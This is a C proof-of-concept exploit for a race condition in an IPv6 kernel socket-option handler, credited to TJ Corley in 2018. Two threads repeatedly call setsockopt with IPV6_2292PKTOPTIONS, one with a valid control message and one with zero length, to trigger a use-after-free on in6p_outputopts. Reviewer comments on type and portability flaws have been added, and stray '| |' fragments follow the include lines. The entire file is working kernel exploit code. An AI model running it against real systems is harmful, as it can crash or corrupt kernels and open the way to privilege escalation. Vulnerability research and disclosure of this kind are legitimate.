/*
 * Race condition in ip6_ctloutput where in6p is not locked when calling
 * ip6_pcbopts, which allows a use-after-free on in6p->in6p_outputopts
 *
 * Build: gcc -std=c99 -o poc poc.c -lpthread
 * Run: ./poc
 *
 * Discovered by TJ Corley 8/15/2018
 */
#include <netinet/in.h> | |
#include <pthread.h> | |
#include <stdio.h> | |
#include <sys/socket.h> | |
#include <sys/types.h> | |
/* RFC 2292 IPV6_PKTOPTIONS socket option number, defined locally —
 * presumably because the platform's <netinet/in.h> does not export it;
 * TODO confirm the value against the target kernel's headers. */
#define IPV6_2292PKTOPTIONS 25
/* The single IPv6 UDP socket both threads operate on; assigned once in
 * main() and never validated (socket() may return -1). */
int s;
/*
 * Second-thread loop: repeatedly sets IPV6_2292PKTOPTIONS on the shared
 * socket 's' with a well-formed control message (IPV6_TCLASS = 4), while
 * the main thread runs spam_zero_size_mbuf() against the same option.
 * Never returns. The setsockopt() result is not checked.
 *
 * Review notes:
 *  - cmsg_len uses a literal 4 and the data store is an int write, so this
 *    assumes sizeof(int) == 4 (the buffer itself is sized with sizeof(int)).
 *  - The function is declared with an empty parameter list and no return
 *    value, yet main() passes it to pthread_create() through a (void *)
 *    cast; a conforming start routine is void *(*)(void *).
 */
static void spam_valid() {
    /* One cmsghdr plus room for a single int of option data. */
    char ctrl[CMSG_SPACE(sizeof(int))];
    struct cmsghdr *cmsg = (struct cmsghdr *)&ctrl;
    cmsg->cmsg_len = CMSG_LEN(4);
    cmsg->cmsg_level = IPPROTO_IPV6;
    cmsg->cmsg_type = IPV6_TCLASS;
    char *data = (char *)CMSG_DATA(cmsg);
    *(int *)data = 0x4; /* traffic class value; any valid value would do for this PoC — TODO confirm */
    printf("spamming valid IPV6_2292PKTOPTIONS\n");
    for (;;) {
        setsockopt(s, IPPROTO_IPV6, IPV6_2292PKTOPTIONS, cmsg, CMSG_LEN(4));
    }
}
/*
 * Main-thread loop: repeatedly sets IPV6_2292PKTOPTIONS with an option
 * length of 0. Only the buffer's address is passed; its contents are never
 * read by this program. Per the file header, this zero-length path racing
 * spam_valid() is what exposes the in6p->in6p_outputopts use-after-free.
 * Never returns. The setsockopt() result is not checked.
 *
 * Review notes:
 *  - 'buf' is an array of four char *pointers* (not four bytes); given the
 *    length argument of 0 the distinction does not matter here.
 *  - The empty initializer '{}' is a GNU extension / C23 feature, not C99 as
 *    the build line in the header requests; '{0}' is the portable form.
 */
static void spam_zero_size_mbuf() {
    char *buf[0x4] = {};
    printf("spamming zero size mbuf\n");
    for (;;) {
        setsockopt(s, IPPROTO_IPV6, IPV6_2292PKTOPTIONS, buf, 0);
    }
}
/*
 * Entry point: opens one IPv6 UDP socket, starts spam_valid() on a second
 * thread and then runs spam_zero_size_mbuf() on this thread, so both loops
 * drive the same socket option concurrently. Neither loop returns, so main()
 * only ends when the process is killed or the kernel fault described in the
 * header occurs.
 *
 * Review notes:
 *  - socket() and pthread_create() return values are unchecked; if either
 *    fails the loops spin on an invalid descriptor or only one thread runs.
 *  - The (void *) cast hides the start-routine type mismatch rather than
 *    fixing it; spam_valid should be declared void *spam_valid(void *).
 *  - 't' is never joined or detached; irrelevant here since main() never
 *    returns, but worth noting if this is ever adapted to terminate.
 */
int main() {
    pthread_t t;
    s = socket(AF_INET6, SOCK_DGRAM, 0);
    pthread_create(&t, NULL, (void *)spam_valid, NULL);
    spam_zero_size_mbuf();
}